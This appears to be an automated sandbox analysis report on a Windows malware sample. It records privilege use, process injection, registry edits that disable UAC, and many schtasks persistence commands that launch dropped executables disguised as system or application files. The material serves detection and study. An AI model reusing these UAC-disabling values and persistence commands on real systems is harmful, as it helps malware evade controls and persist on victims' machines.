Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Default\Pictures\SppExtComObj.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4384 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4384 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4384 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4600 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp8E3A.tmp.exe
PID 4384 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 3764 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4384 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe
PID 4384 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe
PID 540 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 540 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 540 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 540 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 540 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe
PID 5004 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB035.tmp.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Default\Pictures\SppExtComObj.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe

"C:\Users\Admin\AppData\Local\Temp\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Users\Public\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Public\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafNf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\es-ES\f61d38016d33a0e5e85b32545e15f8deb3c3a9313492ee05ac4cfb4a9c29bcafN.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

